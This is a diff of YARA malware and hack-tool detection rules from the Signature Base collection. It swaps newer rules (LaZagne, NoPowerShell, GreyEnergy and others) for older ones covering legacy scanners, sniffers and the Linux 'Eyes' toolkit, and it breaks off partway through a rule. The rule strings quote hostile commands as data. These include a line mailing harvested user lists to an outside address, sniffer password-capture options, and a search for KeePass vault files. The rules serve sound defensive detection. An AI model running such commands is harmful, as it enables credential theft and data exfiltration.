-rule SIGNATURE_BASE_HKTL_Sqlmap_Backdoor : FILE
+rule SIGNATURE_BASE_Superscan3_0
 {
 	meta:
-		description = "Detects SqlMap backdoors"
+		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf09caac-cf15-5936-b5b4-df4f28788961"
-		date = "2018-10-09"
+		id = "d22aa3ae-4c62-5007-896d-7c473f0421a6"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/sqlmapproject/sqlmap"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4520-L4536"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2663-L2684"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e09135e3908442d873511b7b75c8475b2345a28f3bad41a242d6fc5a3b7c002"
-		score = 75
+		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
+		logic_hash = "448d3af61062c53c5b148e58697537bd98316e6c6d4d9ed9e0ff36cbd5a0b4f5"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "\\scanner.ini" ascii
+		$s1 = "\\scanner.exe" ascii
+		$s2 = "\\scanner.lst" ascii
+		$s4 = "\\hensss.lst" ascii
+		$s5 = "STUB32.EXE" fullword wide
+		$s6 = "STUB.EXE" fullword wide
+		$s8 = "\\ws2check.exe" ascii
+		$s9 = "\\trojans.lst" ascii
+		$s10 = "1996 InstallShield Software Corporation" fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x8e859c07 or uint32( 0 ) == 0x2d859c07 or uint32( 0 ) == 0x92959c07 or uint32( 0 ) == 0x929d9c07 or uint32( 0 ) == 0x29959c07 or uint32( 0 ) == 0x2b8d9c07 or uint32( 0 ) == 0x2b859c07 or uint32( 0 ) == 0x28b59c07 ) and filesize < 2KB
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Lazagne_Passworddumper_Dec18_1 : FILE
+rule SIGNATURE_BASE_Sig_238_Xsniff
 {
 	meta:
-		description = "Detects password dumper Lazagne often used by middle eastern threat groups"
+		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bae48a4d-33b6-55b9-abf5-daf87e5da9e9"
-		date = "2018-12-11"
+		id = "1e61a732-8691-5f84-beb0-c9f7e6d46538"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4538-L4558"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2686-L2707"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "887c8e91942076395dc7575d5cbd926e7e0971a759daf719983dd918d9babad3"
-		score = 85
+		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
+		logic_hash = "90c08db197a00885ffc62967bd814479a438f500316cf65e81fcec617517dd9c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1205f5845035e3ee30f5a1ced5500d8345246ef4900bcb4ba67ef72c0f79966c"
-		hash2 = "884e991d2066163e02472ea82d89b64e252537b28c58ad57d9d648b969de6a63"
-		hash3 = "bf8f30031769aa880cdbe22bc0be32691d9f7913af75a5b68f8426d4f0c7be50"
 
 	strings:
-		$s1 = "softwares.opera(" ascii
-		$s2 = "softwares.mozilla(" ascii
-		$s3 = "config.dico(" ascii
-		$s4 = "softwares.chrome(" ascii
-		$s5 = "softwares.outlook(" ascii
+		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+		$s3 = "%s - simple sniffer for win2000" fullword ascii
+		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+		$s7 = "http://www.xfocus.org" fullword ascii
+		$s9 = "  -pass        : Filter username/password" fullword ascii
+		$s18 = "  -udp         : Output udp packets" fullword ascii
+		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s20 = "  -tcp         : Output tcp packets" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 17000KB and 1 of them
+		6 of them
 }
-rule SIGNATURE_BASE_HKTL_Lazagne_Gen_18
+rule SIGNATURE_BASE_Sig_238_Fscan
 {
 	meta:
-		description = "Detects Lazagne password extractor hacktool"
+		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "034ea6d8-f5cf-5664-9ff9-24d19403093d"
-		date = "2018-12-11"
+		id = "7af4d38a-bc88-57ba-b602-4e01d3d95015"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://creativecommons.org/licenses/by-nc/4.0/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4560-L4577"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2709-L2730"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f3e895080267a551a3b7a0ba2d4207b31befacbd35d1e6941e1b69d7e2689ce"
-		score = 80
+		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
+		logic_hash = "0af558345e8c85021fd4f8d399dacb3b6e8d9c692060c31a36e943fc48bfabff"
+		score = 60
 		quality = 85
 		tags = ""
-		hash1 = "51121dd5fbdfe8db7d3a5311e3e9c904d644ff7221b60284c03347938577eecf"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "lazagne.config.powershell_execute(" ascii
-		$x2 = "creddump7.win32." ascii
-		$x3 = "lazagne.softwares.windows.hashdump" ascii
-		$x4 = ".softwares.memory.libkeepass.common(" ascii
+		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
+		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
+		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
+		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
+		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
+		$s13 = "http://www.foundstone.com" fullword ascii
+		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
+		$s18 = "Bind port number out of range. Using system default." fullword ascii
+		$s19 = "fscan.exe" fullword wide
 
 	condition:
-		2 of them
+		4 of them
 }
-rule SIGNATURE_BASE_HKTL_Nopowershell
+rule SIGNATURE_BASE__Iissample_Nesscan_Twwwscan
 {
 	meta:
-		description = "Detects NoPowerShell hack tool"
+		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "17d508d5-833f-5232-a071-dbed8758493b"
-		date = "2018-12-28"
-		modified = "2022-12-21"
-		reference = "https://github.com/bitsadmin/nopowershell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4579-L4596"
+		id = "a710ca8e-54dc-5a98-b173-c87b22af745f"
+		date = "2014-11-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2732-L2758"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2207af9fcc61d547dfeff347a1eae2c59024a7270d1b8cbb7abef56d80864728"
-		score = 75
+		logic_hash = "6088dd060507f4efa2f4c1770dc746100966e8a7475859918488d7be6c96bc31"
+		score = 60
 		quality = 85
 		tags = ""
-		hash1 = "2dad091dd00625762a7590ce16c3492cbaeb756ad0e31352a42751deb7cf9e70"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
+		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
+		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
 
 	strings:
-		$x1 = "\\NoPowerShell.pdb" ascii
-		$x2 = "Invoke-WmiMethod -Class Win32_Process -Name Create \"cmd" fullword wide
-		$x3 = "ls C:\\Windows\\System32 -Include *.exe | select -First 10 Name,Length" fullword wide
-		$x4 = "ls -Recurse -Force C:\\Users\\ -Include *.kdbx" fullword wide
-		$x5 = "NoPowerShell.exe" fullword wide
+		$s0 = "Connecting HTTP Port - Result: " fullword
+		$s1 = "No space for command line argument vector" fullword
+		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
+		$s5 = "No space for copy of command line" fullword
+		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
+		$s8 = "scanf : floating point formats not linked" fullword
+		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
+		$s13 = "!\"what?\"" fullword
+		$s14 = "%s Port %d Closed" fullword
+		$s16 = "printf : floating point formats not linked" fullword
+		$s17 = "xxtype.cpp" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Htran_Go : FILE
+rule SIGNATURE_BASE__Fshttp_Fspop_Fssniffer
 {
 	meta:
-		description = "Detects go based htran variant"
-		author = "Jeff Beley"
-		id = "bd9409e3-3d4c-57d6-af60-b6d6bd93d46b"
-		date = "2019-01-09"
+		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5ca543af-2589-52b0-83f9-ad25ba76b633"
+		date = "2014-11-23"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4598-L4611"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2760-L2786"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "444fe8ce2fdb67c982de26a10882d2cfebc4d2de6c4b4ba6ee10cf39130f1cc5"
-		score = 75
+		logic_hash = "50c91f1036ae467de51227b6782978c33607f94724d2e1b0af7c958028a84b48"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "4acbefb9f7907c52438ebb3070888ddc8cddfe9e3849c9d0196173a422b9035f"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
+		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
+		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
 
 	strings:
-		$s1 = "https://github.com/cw1997/NATBypass" fullword ascii
-		$s2 = "-slave ip1:port1 ip2:port2" fullword ascii
-		$s3 = "-tran port1 ip:port2" fullword ascii
+		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
+		$s1 = "-ERR Get SMS Users ID Failed" fullword
+		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword
+		$s3 = "-ERR Post SMS Failed" fullword
+		$s4 = "Current.hlt" fullword
+		$s6 = "Histroy.hlt" fullword
+		$s7 = "-ERR Send SMS Failed" fullword
+		$s12 = "-ERR Change Password <New Password>" fullword
+		$s17 = "+OK Send SMS Succussifully" fullword
+		$s18 = "+OK Set New Password: [%s]" fullword
+		$s19 = "CHANGE PASSWORD" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Katz_PDB : FILE
+rule SIGNATURE_BASE_Ammyy_Admin_AA_V3
 {
 	meta:
-		description = "Detects suspicious PDB in file"
+		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79f4f07c-b234-5203-a2ab-aba4a9cb9f8d"
-		date = "2019-02-04"
+		id = "bb140cb7-9f56-5acb-883e-080dfd3f60d5"
+		date = "2014-12-22"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4613-L4626"
+		reference = "http://goo.gl/gkAg2E"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2788-L2812"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a38f63d8e8baa9bc8f34c1886fc2aaea7f61d5e09792ba9cde4cf6ed8441fab"
-		score = 65
-		quality = 60
-		tags = "FILE"
-		hash1 = "6888ce8116c721e7b2fc3d7d594666784cf38a942808f35e309a48e536d8e305"
+		logic_hash = "6ab1de9f3b58cdb2c03f2d72986772333f8b81c98e6cbfd941f20b2fed1c5ff2"
+		score = 55
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
+		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"
 
 	strings:
-		$s1 = /\\Release\\[a-z]{0,8}katz.pdb/
-		$s2 = /\\Debug\\[a-z]{0,8}katz.pdb/
+		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
+		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
+		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
+		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
+		$x5 = "Please enter password for accessing remote computer" fullword ascii
+		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
+		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
+		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
+		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them
+		2 of ( $x* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_LNX_Pnscan : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_Scanssh
 {
 	meta:
-		description = "Detects Pnscan port scanner"
+		description = "Linux hack tools - file scanssh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "46c6c0d9-08bb-5de3-ad14-c1a7ab0542c6"
-		date = "2019-05-27"
+		id = "9546d0d8-42af-5b4c-ac93-195d14bfbb5b"
+		date = "2015-01-19"
 		modified = "2025-12-18"
-		reference = "https://github.com/ptrrkssn/pnscan"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4628-L4641"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2816-L2841"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46a064f9df9d0a0f3fad4ec7be70b1e42074e5e117f7403d8239bc725590f268"
-		score = 55
+		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
+		logic_hash = "cb20c28f1767ce23f60c377943d8a129fa069b1a1407bbaf43370f0ff79ade30"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "-R<hex list>   Hex coded response string to look for." fullword ascii
-		$x2 = "This program implements a multithreaded TCP port scanner." ascii wide
+		$s0 = "Connection closed by remote host" fullword ascii
+		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
+		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
+		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
+		$s5 = "Server closed connection" fullword ascii
+		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
+		$s9 = "Remote host closed connection" fullword ascii
+		$s10 = "%s: line %d: bad command `%s'" fullword ascii
+		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
+		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
+		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
 
 	condition:
-		filesize < 6000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Paexec : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_Pscan2
 {
 	meta:
-		description = "Detects remote access tool PAEXec (like PsExec) - file PAExec.exe"
+		description = "Linux hack tools - file pscan2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ee564534-b921-5639-a7ed-5da79d6bf86a"
-		date = "2017-03-27"
+		id = "02d96766-6696-5410-ad48-bd8cb642ac51"
+		date = "2015-01-19"
 		modified = "2025-12-18"
-		reference = "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4643-L4663"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2843-L2861"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "30478d90756a9ea362c40236518fe9013e5e5683641b7e7e1ad33aa3b5587e04"
-		score = 40
+		hash = "56b476cba702a4423a2d805a412cae8ef4330905"
+		logic_hash = "3686ccbd53a6dcedf9b10d131a1fc76b51b265328ad10f63671b64d4bf57a0b6"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Ex: -rlo C:\\Temp\\PAExec.log" fullword ascii
-		$x2 = "Can't enumProcesses - Failed to get token for Local System." fullword wide
-		$x3 = "PAExec %s - Execute Programs Remotely" fullword wide
-		$x4 = "\\\\%s\\pipe\\PAExecIn%s%u" fullword wide
-		$x5 = "\\\\.\\pipe\\PAExecIn%s%u" fullword wide
-		$x6 = "%%SystemRoot%%\\%s.exe" fullword wide
-		$x7 = "in replacement for PsExec, so the command-line usage is identical, with " fullword ascii
-		$x8 = "\\\\%s\\ADMIN$\\PAExec_Move%u.dat" fullword wide
+		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
+		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
+		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
+		$s8 = "Invalid IP." fullword ascii
+		$s9 = "# scanning: " fullword ascii
+		$s10 = "Unable to allocate socket." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) ) or ( 3 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_Domainpasswordspray : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_A
 {
 	meta:
-		description = "Detects the Powershell password spray tool DomainPasswordSpray"
-		author = "Arnim Rupp"
-		id = "890e4514-2846-54f8-8f32-cc9d2a4ef81b"
-		date = "2023-01-13"
+		description = "Linux hack tools - file a"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2b4f52d4-b438-5040-89c5-aab1df15200e"
+		date = "2015-01-19"
 		modified = "2025-12-18"
-		reference = "https://github.com/dafthack/DomainPasswordSpray"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4665-L4680"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2863-L2881"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa20bf139eff36100624771fe7617c214337ae5ab2e2746143bd8e6cc1b05b4e"
-		score = 60
+		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
+		logic_hash = "a246eb907fd6525c96c911acde6b513fca68248ef8d4f8fa64039791942950ab"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "44d4c0ae5673d2a076f3b5acdc83063aca49d58e6dd7cf73d0b927f83d359247"
 
 	strings:
-		$s = "Invoke-DomainPasswordSpray" fullword ascii wide
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "mv scan.log bios.txt" fullword ascii
+		$s2 = "rm -rf bios.txt" fullword ascii
+		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
+		$s4 = "././pscan2 $1 22" fullword ascii
+		$s10 = "echo \"#cautam...\"" fullword ascii
 
 	condition:
-		filesize < 100KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_Rusthound : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_Mass
 {
 	meta:
-		description = "Detect hacktool RustHound (Sharphound clone)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d2fd79a5-9a1a-51de-920c-61653c8b0064"
-		date = "2023-03-30"
+		description = "Linux hack tools - file mass"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5da0c474-2dc8-5580-bf5c-d3f464225e4c"
+		date = "2015-01-19"
 		modified = "2025-12-18"
-		reference = "https://github.com/OPENCYBER-FR/RustHound"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4682-L4709"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2883-L2900"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "409f61a34d9771643246f401a9670f6f7dcced9df50cbd89a2e1a5c9ba8d03ab"
-		hash = "b1a58a9c94b1df97a243e6c3fc2d04ffd92bc802edc7d8e738573b394be331a9"
-		hash = "170f4a48911f3ebef674aade05184ea0a6b1f6b089bcffd658e95b9905423365"
-		hash = "e52f6496b863b08296bf602e92a090768e86abf498183aa5b6531a3a2d9c0bdb"
-		hash = "847e57a35df29d40858c248e5b278b09cfa89dd4201cb24262c6158395e2e585"
-		hash = "4edfed92b54d32a58b2cfc926f98a56637e89850410706abcc469a8bc846bc85"
-		hash = "feba0c16830ea0a13819a9ab8a221cc64d5a9b3cc73f3c66c405a171a2069cc1"
-		hash = "21d37c2393a6f748fe34c9d2f52693cb081b63c3a02ca0bebe4a584076f5886c"
-		hash = "874a1a186eb5808d456ce86295cd5f09d6c819375acb100573c2103608af0d84"
-		hash = "bf576bd229393010b2bb4ba17e49604109e294ca38cf19647fc7d9c325f7bcd1"
-		logic_hash = "386b734ad7f3cf02f096236c941033b3f905a3368b8a72dd63e91e6e94f12f8d"
+		hash = "2054cb427daaca9e267b252307dad03830475f15"
+		logic_hash = "5bf17d1a8ae78681d2c3cba8511019ddf85e6d7a242900b56848521eef40ffc6"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$rh1 = "rusthound" fullword ascii wide
-		$rh2 = "Making json/zip files finished!" ascii wide
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
+		$s3 = "killall -9 pscan2" fullword ascii
+		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
+		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0x457f ) and 1 of ( $rh* )
+		1 of them
 }
-
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_1 : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_Pscan2_2
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "Linux hack tools - file pscan2.c"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc997540-075e-5f1c-9238-135c1572553b"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L12-L29"
+		id = "3950b235-70bc-5afd-add5-38c50055b28b"
+		date = "2015-01-19"
+		modified = "2025-12-18"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2902-L2919"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0cbdc156b7080608c1071feeb4826a70bb259c55139d74d019465c4bb5244260"
+		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
+		logic_hash = "981514cf0887a1a7cb55fe9ed9dadd48adbf0f033e527b357e90e052a4c2d251"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "%SystemRoot%\\System32\\thinmon.dll" fullword ascii
-		$s2 = "'Cannot delete list entry (fatal error)!9The module %s cannot be executed on this system (0x%.4x).%Enumerate all sessions on TSE" wide
-		$s8 = "cbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbe" ascii
-		$s14 = "configure the service" fullword wide
+		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
+		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
+		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
+		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
+		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "98d1ad672d0db4b4abdcda73cc9835cb" and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_2 : FILE
+rule SIGNATURE_BASE_CN_Portscan : APT FILE
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "CN Port Scanner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "50830741-ba3d-505c-bb21-8cedc2162f96"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L31-L44"
+		id = "fb52a89a-2270-5170-9874-9278a0177454"
+		date = "2013-11-29"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2921-L2934"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "600bc5b423ef3281bfc7ad7ab479aa1208b0144b0f4afd8c2d14f17b5e2c600b"
-		score = 75
